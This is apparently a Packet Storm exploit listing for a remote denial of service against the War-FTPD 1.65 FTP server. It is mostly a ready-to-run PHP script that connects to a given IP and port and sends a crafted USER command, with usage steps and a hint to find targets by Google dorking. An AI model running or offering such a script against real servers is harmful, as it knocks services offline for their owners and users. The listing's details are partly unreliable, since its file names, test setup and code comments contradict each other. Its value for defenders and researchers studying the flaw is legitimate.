War-FTPD 1.65 Denial of Service

🗓️ 11 Mar 2025 00:00:00Reported by indoushkaType

packetstorm🔗 packetstorm.news👁 200 Views

War-FTPD 1.65 has a denial of service vulnerability that can be exploited remotely.

=============================================================================================================================================
    | # Title     : War-FTPD 1.65 Username - Denied of Service vulnerability                                                                    |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |
    | # Vendor    : https://tcls.tripod.com/warftpd.htm                                                                                         |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] Code Description: War-FTPD version 1.65 remote denial of service exploit.
    
       (Related : https://packetstorm.news/files/id/176926/ Linked CVE numbers:  ) .
    	
    [+] save code as poc.php.
    
    [+] Usage = C:\www>php 2.php 127.0.0.1 21
    
    [+] PayLoad :
    
    <?php
    // War-FTPD 1.65 Username - Denied of Service (DoS) exploit
    
    function intro() {
        echo "\n-------------------------------------------------------------------------\n";
        echo "--------------- [+] War-FTPD 1.65 Username - Denied of Service (DoS) ----\n";
        echo "----------------------------indoushka------------------------------------\n";
    }
    
    function main_exploit($ip, $port) {
        $exploit = "\x41\x41\x41\x41\x41\x41\x41\x41"; // Add more 'A's if needed
        $exploit .= "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e\r\n";
    
        // إنشاء الاتصال بالخادم
        $sock = fsockopen($ip, $port, $errno, $errstr, 30);
        if (!$sock) {
            echo "Connection Failed: $errstr\n";
            exit(1);
        }
    
        // قراءة البيانات الأولية من الخادم
        $buffer = fread($sock, 1024);
        echo "Connected => $buffer\n";
    
        // إرسال طلب "USER" مع الحمولة
        fwrite($sock, "USER ");
        fwrite($sock, $exploit);
    
        // قراءة رد الخادم
        $buffer = fread($sock, 1024);
        echo "Authentication USER: $buffer\n";
    
        fclose($sock);
    }
    
    // التحقق من المدخلات عبر POST أو GET
    if ($argc != 3) {
        echo "Usage: php script.php <ip> <port>\n";
        exit(1);
    }
    
    intro();
    main_exploit($argv[1], $argv[2]);
    ?>
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

11 Mar 2025 00:00Current

7.2High risk

Vulners AI Score7.2